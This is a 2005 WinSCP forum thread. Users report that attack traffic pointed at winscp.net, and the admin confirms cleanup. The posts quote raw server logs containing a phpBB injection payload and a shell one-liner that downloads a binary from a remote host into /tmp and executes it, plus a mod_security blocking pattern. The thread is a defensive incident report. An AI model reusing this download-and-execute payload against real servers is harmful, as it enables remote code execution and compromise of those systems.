WinSCP Free SFTP, FTP and SCP client for Windows

Topic "THIS SITE IS HACKED!!"

[Reply to topic] [Log in] [Forum Index] [Forum "Support and Bug Reports"] [Previous topic] [Next topic]

Author	Message
DogForum Guest	Posted: 21 Jul 2005 23:50 THIS SITE IS HACKED!! [Reply with quote] Does anyone of the admin folks here know that this server has been hacked it's currently delivering the malware for further attacks on thousands of other systems? Here a HTTP header i've got a number of days today: Quote: ======================================== Request: 216.240.142.215 - - [[22/Jul/2005:00:13:53 +0200]] "GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628 Handler: (null) ---------------------------------------- GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0 Host: [snip for security reasons] Accept: / User-Agent: Mozilla/4.0 PHP: cd /tmp;wget http: / / winscp.net/forum/db/session;chmod +x session;./session;rm -f session Please shut this server down as quickly as possible and privide for ALL the necessary cleanup and software updates necessary to avoid this situation!! For further info contact me at: fsaom at spmtst.homeip.net Kind regards Manf
Advertisements
Guest	Posted: 22 Jul 2005 03:58 [Reply with quote] Got attacked by this site also: Quote: HTTP/1.1 403 Forbidden Content-Length: 309 Keep-Alive: timeout=15, max=293 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 ======================================== UNIQUE_ID: tvY7Tdh-VEwAAC9oCjQAAAAE Request: 217.22.54.52 - - [21/Jul/2005:21:20:51 --0500] "GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(get env(HTTP_PHP)).' HTTP/1.0" 403 293 Handler: (null) ---------------------------------------- GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0 Host: www.MYSITE.com Accept: / User-Agent: Mozilla/4.0 PHP: cd /tmp;wget http://winscp.net/forum/db/session;chmod +x session;./session;rm -f session mod_security-message: Access denied with code 403. Pattern match "(system\|exec\|passthru\|cmd\|fopen\|exit\|fwrite\|wget)" at THE_REQUEST mod_security-action: 403[
prikryl [View user's profile] Site Admin Joined: 10 Dec 2002 Posts: 11792 Location: Prague, Czech republic	Posted: 22 Jul 2005 Re: THIS SITE IS HACKED!! [Reply with quote] Issue is hopefully solved. I apologise for any trouble it caused you and my negligence. _________________ Martin Prikryl
prikryl [View user's profile] Site Admin Joined: 10 Dec 2002 Posts: 11792 Location: Prague, Czech republic	Posted: 22 Jul 2005 Re: THIS SITE IS HACKED!! [Reply with quote] Also please note that the attacks seem to continue from other affected servers. The attacks attempt to use our server to donwload the files. However the files are no longer present on our server. Note that both IP addresess listed above are not of our server! _________________ Martin Prikryl
Advertisements

[Reply to topic]

You can post new topics in this forum

Search

What is WinSCP?

WinSCP is an open source SFTP client and FTP client for Windows. Its main function is the secure file transfer between a local and a remote computer. Beyond this, WinSCP offers basic file manager functionality. It uses Secure Shell (SSH) and supports, in addition to Secure FTP, also legacy SCP protocol. [More]

WinSCP is also available as a plugin to two file managers, FAR and Altap Salamander.

Donate

License

WinSCP is free, open-source software, and is distributed under the GNU General Public License (GPL). [More]

Associations

Site design by Black Gate